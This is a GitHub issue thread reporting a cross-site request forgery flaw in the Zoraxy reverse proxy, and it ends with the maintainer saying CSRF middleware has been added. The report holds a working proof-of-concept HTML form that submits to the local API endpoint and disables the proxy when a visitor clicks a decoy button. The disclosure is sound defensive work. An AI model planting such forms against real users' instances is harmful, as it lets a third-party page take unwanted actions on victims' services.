### ISSUE TITLE
[BUG] CSRF Vulnerability

### ISSUE THREAD

**Issue by YamiOdymel** [tobychui/zoraxy#267]
**Describe the bug**
A CSRF vulnerability. Allowing a user to perform an action on website A while actually submitting a form to Zoxary, resulting in some unwanted behavior.

**To Reproduce**
Can be reproduced with the following HTML code:

```html
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8" />
    </head>
    <body>
        <form action="http://localhost:8000/api/proxy/enable">
            <input type="hidden" name="enable" value="false" />
            <button type="submit">PRESS ME!</button>
        </form>
    </body>
</html>
```

**Expected behavior**
I was supposed to get a free burger, but I ended up shutting down my Zoxary instead.

**Screenshots**

![image](https://github.com/user-attachments/assets/0097f4d5-ed1e-408b-acbf-9aa043745ad5)

**Host Environment (please complete the following information):**
- Arch: amd64
- OS: Windows 11
- Zoraxy Version: v3.0.9

**Additional context**

https://github.com/tobychui/arozos/issues/62

**Comment by tobychui** [comment]
Gorilla csrf middleware has been added to the current API system. This should be fixed in the next release.

![圖片](https://github.com/user-attachments/assets/217a6eea-ae3e-42d2-90f2-f4903e5775a0)
